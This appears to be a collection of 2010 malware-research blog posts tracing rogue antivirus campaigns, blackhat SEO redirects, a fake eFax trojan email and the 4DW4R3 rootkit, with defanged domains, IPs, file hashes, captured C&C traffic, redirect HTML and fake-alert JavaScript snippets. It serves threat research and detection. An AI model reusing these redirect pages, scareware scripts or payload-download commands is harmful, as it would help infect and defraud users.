POST /trackstats.php HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 6199.zdropp.co. cc
 
POST /application.php HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 6199.zdropp.co. cc
 
GET /download.php?bundle=1 HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: s6199.wdropp.co. cc
 
GET /list.php?c=XXX&v=2&t=0,2486841 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: justoldleft. ru
 
GET /tm/crypt.exe?t=0,6011011 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: www.derquda. com
 
GET /sn.php?c=XXX&t=0,8542902 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: justoldleft. ru

URLVoid domain analysis:

http://www.urlvoid.com/scan/justoldleft.ru
http://www.urlvoid.com/scan/derquda.com
http://www.urlvoid.com/scan/s6199.wdropp.co.cc
http://www.urlvoid.com/scan/wdropp.co.cc
http://www.urlvoid.com/scan/6199.zdropp.co.cc
http://www.urlvoid.com/scan/zdropp.co.cc
http://www.urlvoid.com/scan/5630.zdropp.co.cc
http://www.urlvoid.com/scan/talkwire.in
http://www.urlvoid.com/scan/efirst-data.in
http://www.urlvoid.com/scan/image4msn.com
http://www.urlvoid.com/scan/get.zdropp.co.cc
http://www.urlvoid.com/scan/rs851tl2.rapidshare.com
http://www.urlvoid.com/scan/lameedge.ru
http://www.urlvoid.com/scan/casualhopperois.com
http://www.urlvoid.com/scan/adamplus.com
http://www.urlvoid.com/scan/lostyear.ru

Recent Websites Associated with Fake Scanner Pages

Domains associated with recent fake scanner pages, used to distribute setup files of rogue security software and used to deliver web exploits and hidden redirections to dangerous websites, always related to rogue software distribution.

nvrsewep.co. cc78.26.179.6
svrwvrtep.co. cc78.26.179.6
puwibryj.co. cc78.26.179.6
svrwvrtep.co. cc78.26.179.6
wofycof.co. cc78.26.179.6
xysihibr.co. cc78.26.179.6
zununuj.co. cc78.26.179.6
brilerzit.co. cc78.26.179.6
gvrlynerf.co. cc78.26.179.6
sekvrfig.co. cc78.26.179.6
www3.saveguardin4u. in65.23.153.126
saveguardin4u. in – –
www3.bestcleansentinel. in – –
bestcleansentinel. in – –
www1.hardsuitescanner. in173.192.68.246
hardsuitescanner. in – –
www2.strong-power-army. in83.133.124.177
strong-power-army. in – –
www3.safe-suiteholder. com – –
safe-suiteholder. com – –
www3.smartantivirforu. com – –
smartantivirforu. com – –
www3.top-pckeeper. com – –
top-pckeeper. com – –
www4.safe-zoneng. net – –
safe-zoneng. net – –
www1.chckeck. in – –
chckeck. in – –
www1.guardianaor. in – –
guardianaor. in – –
www1.opensoftscanav. com – –
opensoftscanav. com – –
www1.personal-scan-holder. in – –
personal-scan-holder. in – –
www1.profalsave. in – –
profalsave. in – –
www2.firstguardin4u. com – –
firstguardin4u. com – –

Free download cracked software with surprise

We have logged another website used to capture keywords related to software and to spread Renos trojan and other dangerous threats as execuable files of software cracks and keygens. The website uses blackhat seo strategies to attract most users possibles and to appear in the first pages of search engines.

Cracked Software Website

The file that is downloaded from the dangerous website is:

Downloaded File

Report 2010-10-28 02:11:21 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 435c56e76544772ae273a324066df2cc
SHA1 Hash 2df1627a8e6dd607ac79b8ed4d3d32ebbadc4bf5
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:11:44 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 80044a9b4867e9e45a465a5628de795f
SHA1 Hash 597ff8fd30eddd9b985fd26fff235277e585e81e
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:17 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 798c460f8a7af4a54f863ff68fec064a
SHA1 Hash 78d20e58b107111ca552d65137a65335375bd012
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:39 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 1ec2315af5929d0462fc9c5dd1e6aaf1
SHA1 Hash d72d642b5f4a6e11766b274f64d2263263fd58ee
Detections: 2 / 16 (13 %)
Status INFECTED

An interesting thing is that everytime we tried to download the infected file, it had always a different md5 checksum hash. This means that most probably the payload is created on-the-fly or there are various executable versions of the malware stored in the server, that are downloaded randomly. Is possible this is done to make sure the website distributes always an up-to-date malware executable, and so not detected by security software.

During the analysis, the following files have been created in our system:

Created Files

Suspicious DNS queries:

megadataonline .net .....
mydynatri .net .....
zoozus .com .....
threezio .com .....
sina.com .cn .....
waytoall .com .....
topdworld .com .....
thevehic .com .....
ad.tlvmedia .com .....

Network traffic:

POST /muchahos.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: megadataonline .net
 
POST /logos/bd305e793bda3beeb28218754d729da6f334759cdd06b5446bb70c4cc2842087c284f404583eee08b/0485038023a/logo.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mydynatri .net
 
POST /werber/94653350334/217.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: zoozus .com
 
POST /perce/fd103eb9fbba9bfe524268857d427d06236465cccda62504eb372cece2b4b0e7c2e4a4b4984ebef88/1475f360f30/qwerce.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: threezio .com
 
POST /borders.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: waytoall .com
 
POST /1wave.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: topdworld .com
 
GET /2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d HTTP/1.1
Referer: hxxp://ovguide .com/
Host: thevehic .com
 
GET /st?ad_type=iframe&ad_size=120x600&section=1447253 HTTP/1.1
Referer: hxxp://thevehic .com/2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d
Host: ad.tlvmedia .com

The malware looks like to have posted, with the method “POST”, a lot of encrypted data to various website urls and at the end it received commands to visit some advertisement links.

Domaind & IP Analysis:

sotapartners.net174.123.211.138 – AS: 21844
data-mortgage.com78.46.76.170 – AS: 24940
megadataonline.net64.191.16.70 – AS: 21788
mydynatri.net77.78.248.84 – AS: 42560
zoozus.com85.234.190.47 – AS: 6851
threezio.com77.78.239.42 – AS: 42560
waytoall.com96.9.157.39 – AS: 21788
topdworld.com173.212.250.130 – AS: 21788
thevehic.com173.212.245.243 – AS: 21788
ad.tlvmedia.com217.163.21.37 – AS: 42173

Other suspicious domains hosted in 64.191.16.70:

brodiero.com64.191.16.70 – AS: 21788
megadatacentral.net64.191.16.70 – AS: 21788
megadataonline.net64.191.16.70 – AS: 21788
spiderfile.net87.255.51.229 – AS: 38930

Other suspicious domains hosted in 85.234.190.47:

chattertune.net85.234.190.47 – AS: 6851
mybubblebean.com – – – AS: NA
roonotimex.com85.234.190.47 – AS: 6851

BlackHat SEO Campaign used to spread Smart Engine

A new blackhat seo campaign is distributing the setup installer of the new rogue security software named Smart Engine. The spreading status looks like to be pretty aggressive, we have logged more than 2000 infected websites that are used to capture popular keywords and to redirect users to malicious urls or other fake scanner pages, with the intent to install the rogue software installer.

When an user clicks on an infected url, there is a redirection:

<html>
<head>
<title></title>
<meta http-equiv="refresh" content="0; url=hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">
</head>
<body>
<script language="javascript">
self.location.href = "hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX";
</script>
<a href="hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">Please Click Here</a>
</body>
</html>

Domain & IP Analysis:

www4.get-bestlink3 .co.cc
209.212.149.22 – ip-209.212.149.22.servernap.net

Another redirection:

HTTP/1.1 302 Moved Temporarily
Location: hxxp://www2.best-install10 .co.cc/?p=XXX

Domain & IP Analysis:

www2.best-install10 .co.cc
212.117.168.150 – ip-212-117-168-150.server.lu

And now we can see the fake scanner page:

Fake Scanner Page

After few times, it is prompted the download of an executable:

Executable File Download

Location: hxxp://www2.doit-nowandfast .net/ejvlkn107_2211.php?p=XXX
HTTP/1.1 200 OK
Content-Type: application/octetstream
Pragma: hack
Content-Length: 270336
Content-Disposition: attachment; filename=packupdate107_2211.exe
Content-Transfer-Encoding: binary
Set-Cookie: ds=1

Domain & IP Analysis:

www2.doit-nowandfast .net
188.65.74.86 – –

The downloaded file is the installer of the Smart Engine rogue security software:

Smart Engine Installer

Main GUI of Smart Engine:

Smart Engine GUI

Smart Engine main executable is trying to connect to a remote host:

Windows Firewall Alert

GET /index.php?0d40b0=mNjf0tXm1J2a0du01sLl35A%3D HTTP/1.0
Host: update1.liwnarwlentoristorg910 .net
 
GET /?0d40b0=XXX HTTP/1.0
Host: report1.liwnarwlentoristorg910 .net

DNS Queries:

www5.smart-engine .net
secure1.buy-the-guardian .com

Domain & IP Analysis:

update1.liwnarwlentoristorg910 .net
188.65.74.83 – –
report1.liwnarwlentoristorg910 .net
209.222.8.102 – 209.222.8.102.choopa.net

Activation page:

Smart Engine Activation Page

GET /?kp=kdTHxeevuH5zneDK4eiso1Pk28WhmJI%3D HTTP/1.1
Host: secure1.wlentor-traden-quzonk-1 .com

Domain & IP Analysis:

secure1.wlentor-traden-quzonk-1 .com
69.57.173.219 – –

Smart Engine is sold for:

$49.95 -> 6 Month Guard Subscription
$69.95 -> 1 Year Guard Subscription
$89.95 -> Lifetime Guard Subscription

Network traffic:

HEAD / HTTP/1.1
Host: update1.wlentor-traden-quzonk-1 .com
 
HEAD / HTTP/1.1
Host: report1.wlentor-traden-quzonk-1 .com
 
HEAD / HTTP/1.1
Host: www5.wlentor-traden-quzonk-1 .com

Domain & IP Analysis:

update1.wlentor-traden-quzonk-1 .com
173.244.223.32 – 173.244.223.32.static.midphase.com
report1.wlentor-traden-quzonk-1 .com
173.244.223.37 – 173.244.223.37.static.midphase.com
www5.wlentor-traden-quzonk-1 .com
69.57.173.221 – –

The subdomain used for the activation page changed few IPs during the analysis:

09/10/2010 14.32.58 # secure1.wlentor-traden-quzonk-1 .com # 209.212.149.23
09/10/2010 14.32.57 # secure1.wlentor-traden-quzonk-1 .com # 69.57.173.219

Network traffic:

GET /?xohmdu=XXX HTTP/1.1
Host: update1.wlentor-traden-quzonk-1 .com
Content-Type: application/octetstream
Pragma: hack
Content-Length: 1307
Content-Disposition: attachment; filename=04869.ini
Content-Transfer-Encoding: binary
GET /?pg=XXX HTTP/1.1
Host: report1.wlentor-traden-quzonk671 .com

Domain & IP Analysis:

report1.wlentor-traden-quzonk671 .com
174.36.42.71 – amu.furumoon.net

The subdomain changed few IPs during the analysis:

09/10/2010 14.33.04 # report1.wlentor-traden-quzonk671 .com # 174.36.42.71
09/10/2010 14.33.06 # report1.wlentor-traden-quzonk671 .com # 209.222.8.100

DNS Queries:

.............cilt442vyabkqqv.com.....
.............cilt442vyabkqqv.com.....À........D.&%v=spf1 a mx ip4:209.222.8.100/22 ?all

The malware queried an external url to get our remote IP:

GET /get_ip.php?loc= HTTP/1.1
Host: www.myip .ru

After few time, we noticed a connections loop:

HEAD / HTTP/1.1
User-Agent: Sm17a_2211
Host: 74.125.45.100
 
HEAD / HTTP/1.0
User-Agent: Sm17a_2211
Host: 74.125.45.100
 
HEAD / HTTP/1.0
User-Agent: Sm17a_2211
Host: 74.125.45.100

It looks like it tried to connect to google IP to see if the victim is online.

New domain used for payments, note the HTTPS:

Location: hxxps://secure.onlinesystempayment .com/?abbr=SME&price_name=6month&ext3=2211&ext1=MD5HASH&ext2=wvXP;b_IE6;107;11111;MainWindow;day;671;1;0&card=visa

Domain & IP Analysis:

secure.onlinesystempayment .com
209.212.149.23 – ip-209.212.149.23.servernap.net

New connection on port 443:

Remote Address    : 96.9.160.110
Remote Port       : 443
Service Name      : https

IP Analysis:

96.9.160.110 – 96-9-160-110.hostnoc.net

The malware queried also a legit website related to SSL certificates:

GET /GLOBESSLDomainValidatedCA.crt HTTP/1.1
User-Agent: Microsoft-CryptoAPI/5.131.2600.2180
Host: crt.globessl.com

Files created during the installation of the rogue security software:

Files Created

Created desktop icon:

Desktop Icon

Smart Engine installed files:

Smart Engine Files

The hosts file has been modified and it has now +S (System) attribute:

Hosts File System Attribute

Hosts file content:

Hosts File Content

eFax False Email Spreads Antimalware Doctor

We have received today morning an interesting email from eFax (fake), with a suspicious ZIP Archive file (.ZIP) attached, and the subject of the email stated we have received a fax “You’ve got a fax” … the strange part is that the ZIP file contains an executable file (.EXE) with the icon of MS WORD.

Image

Report date: 2010-09-17 13:42:07 (GMT 1)
File name: efax-97901doc-exe
File size: 43008 bytes
MD5 hash: 5276e96227570b2bf6ec85a306db1027
SHA1 hash: 60fe4ecb7cb2b6e9c3173223c35b0fee3aa5149a
Detection rate: 6 on 16 (38%)
Status: INFECTED

The details of the message source of the received emails are as follow:

Image

From: “eFax” efax(at)efax.com
Received: from efax.com (unknown [95.139.213.105])
Subject: You’ve got a fax
Date: Thu, 16 Sep 2010 15:36:03 +0400
MIME-Version: 1.0
Content-Type: multipart/mixed;

We have executed the file in our sandbox and this is the file activity:

Image

The file that has been created in system directory is named hyli.igo and it is the main executable file of the Oficla trojan that is used to control the victim’s computer and to install the rogue security software Antimalware Doctor.

Network Traffic:

GET /group/mixer/bb.php?v=200&id=XXX&b=XXX&tm=0 HTTP/1.1
User-Agent: Opera\9.64
Host: moneymader .ru

Response:

[info]delay:15|upd:1|backurls:hxxp://91.204.48.46 /milk/69.exe[/info]

The malware connected to the C&C server of oficla trojan to receive new commands from the bot owner and from the reponse of the GET query we can see that the malware received the commands to update itself “upd:1” with a new binary file located at “backurls:”.

And now we noticed that the oficla trojan started to download the Antimalware Doctor installer, we can see from the image below that it looks like an installer for the Microsoft Windows Updates, but it will install the rogue security software Antimalware Doctor instead:

Image

Common symptoms of a rogue security software infection are always the repeated false security alerts that state the user’s system is infected by a large numbers of trojans and the user is then forced to click the button “Remove Threats” that will open the main program while execute a fakse system scan:

Image

This is the main GUI of Antimalware Doctor:

Image

Task manager has also been disabled:

Image

New Network Traffic:

GET /inst.php?do=2&a=XXX&b=en&c=XXX&d=10&e=Win5.1.2600SP2 HTTP/1.1
Host: s.statst .in
 
GET /load/load.php?a=XXX&b=en&c=XXX&e=Win5.1.2600SP2 HTTP/1.1
Host: statst .in
 
GET /setup710binfile.exe HTTP/1.1
Host: outgtrf .in
 
GET /install.php?do=1&coid=XXX&fff=XXX&IP=XXX&lct=ITA&v=X240 HTTP/1.1
Host: s.statst .in

Antimalware Doctor started to display fake security alerts that redirected to the website used to purchase this rogue security software, take in mind all the payment systems used by these rogues are fraudulent and in most cases can even steal credit card details that have been inserted during the payment process:

GET /purchase.php?aaa=csp&fff=XXX&sbb=X240-1-aftscann&lct=ITA&ttt=1&tns=1&sss=2&nocashe=1 HTTP/1.1
Host: statst .in

SSL Connection used during payments:

83.133.115.9:443

Domain & IP Analysis:

moneymader .ru / 109.196.134.44
91.204.48.46
outgtrf .in / 89.187.53.250
s.statst.in / 85.234.191.21
statst.in / 85.234.191.21
83.133.115.9

BlackHat SEO Attacks Redirect to 4DW4R3 Rootkit

We have analyzed a new blackhat seo attack these days and we have noticed that now the main target of these attacks are not anymore the spread of rogue security software, but instead they try to spread the dangerous 4DW4R3 rootkit, and then with this rootkit they may install, in future, a new rogue security software in the victim’s computer.

Below there is a small analysis of the network traffic we have captured during the analysis of these new blackhat seo attacks. The targets of the attacks are mostly keywords related to iphone, episodes of cartoons and world cup 2010 matches.

Hijacked URL:

traseusa .com/images/page.php?r=keyword

Response:

<html>
<head>
<title></title>
<meta http-equiv="refresh" content="0; url=hxxp://portalkey .org/?affid=415&subid=landing">
</head>
<body>
<script language="javascript">
self.location.href = "hxxp://portalkey .org/?affid=415&subid=landing";
</script>
<a href="hxxp://portalkey .org/?affid=415&subid=landing">Please Click Here</a>
</body>
</html>

Domain & IP Analysis:

portalkey .org91.212.127.96

The domain portalkey .org is used to display to the user fake security alerts and false system scan reports showing the system is completely infected by trojans:

Image

By analyzing the source of the HTML page, we can see that it uses javascript to display the fake alerts and the fake system scan reports, as example we have extracted few lines of code from the infected page:

{ 		
	alert(this.___("Windows Security Center recommends you to install System Security Antivirus."));
	t.MyConfirm(); 	
}

Image

ExitPopupMessage():

ExitPopupMessage : function()
{ 	
	alert(	this.___("Your computer remains infected by viruses!") + 
	this.___("They can cause data loss and file damages and need to be cured as soon as possible.") + "\n\n" +
	this.___("Return to System Security and download it secure to your PC")); 
}

In particular, the above code will be executed everytime you try to close Internet Explorer and it will force the user to open again the infected page with the Internet Explorer web browser even if the user clicks on “Cancel” button! This can be called like a persistence code that has the main intent to make sure the user will click, before or then, in the malicious page to download the rootkit executable.

clicksmell .org/x92s/uc12vx04/xdtldil.php?id=369

Domain & IP Analysis:

clicksmell .org91.188.59.220

And now it is requested to download the 4dw4r3 executable:

portalkey .org/dl.php?f=XXX&subid=1

Image

Response:

HTTP/1.1 200 OK
Server: nginx/0.7.63
Content-Type: application/octet-stream
Pragma: hack
Content-Length: 11776
Content-Disposition: attachment; filename=WinSecurityInstaller.exe
Content-Transfer-Encoding: binary

Note that the executable file is named as an executable of a rogue security software “WinSecurityInstaller.exe” but in real it will install the rootkit 4DW4R3…

Cookies:

Cookie: NOT_UNIQUE=1; USER_DATA=XXX; TEMPLATE=XXX; affid=409; subid=landing

We have executed the rootkit loader in our sandbox:

Image

Network activity:

GET /a/ad HTTP/1.1
Host: www.searchannoying .org
 
GET /any3/5-direct.ex HTTP/1.1
User-Agent: wget 3.0
Host: searchannoying .org
 
POST /css/pragma/knock.php HTTP/1.1
Host: analitycsdead .com
 
GET /css/pragma/crcmds/main HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/srcr.dat HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crcmds/install HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crfiles/serf HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crfiles/bbr HTTP/1.0
Host: analitycsdead .com
 
GET /readdatagateway.php?type=stats&affid=415&subid=landing&version=4.0&adwareok HTTP/1.1
User-Agent: wget 3.0
Host: searchannoying .org

Domain & IP Analysis:

searchannoying .org91.212.127.96
analitycsdead .com62.122.73.242

Files in Temp Directory:

Image

After few hours, has popped up this new window:

Image

Surprise ? No… It is a rogue security software installer…

Blackhat SEO Attacks targeting (again) World Cup 2010

World Cup 2010 is yet a very popular keyword searched in search engines and we have recently noticed again various blackhat seo attacks that hijacked keywords related to World Cup 2010, players and matches.

The situation is always the same, an user search a keyword, hijacked urls are visible even in first pages and after user has clicked in a malicious url, he is redirected to a fake YouTube video page that spreads setup files of rogue security software. During analysis we logged few new dangerous domains used in these recent blackhat seo campaigns:

www4.protect-soft92.co.cc / 74.118.193.81
www4.protect-soft91.co.cc / 74.118.193.81
www4.protect-soft90.co.cc / 74.118.193.81
www4.protect-soft89.co.cc / 74.118.193.81
www4.protect-soft88.co.cc / 209.212.149.19
www4.protect-soft86.co.cc / 209.212.149.19
www2.soft-analysis84.co.cc / 74.3.166.116
www4.protect-soft82.co.cc / 209.212.149.19
www2.soft-analysis82.co.cc / 74.3.166.116
www2.soft-analysis81.co.cc / 74.3.166.116
www2.soft-analysis79.co.cc / 74.3.166.116
www2.soft-analysis72.co.cc / 94.228.220.112

These malicious websites are used to display the fake scanner page to scary the user with repeated security alerts and to simulate a scan report full of threats that looks like the “My Computer” folder:

Image

The rogue security software that was installed during our tests is named Security Tool and after it is installed it blocks the execution of every application, except if the application we want to execute has the file name iexplore.exe. So basically it allows user to open only Internet Explorer (iexplore.exe) and all other applications are blocked. A simple workaround fix is to rename your analysis tools as iexplore.exe and it will run just fine!

Fake security alert that blocks the execution of a legit setup file:

Image

Main GUI of the rogue security software Security Tool:

Image

Another fake security alert:

Image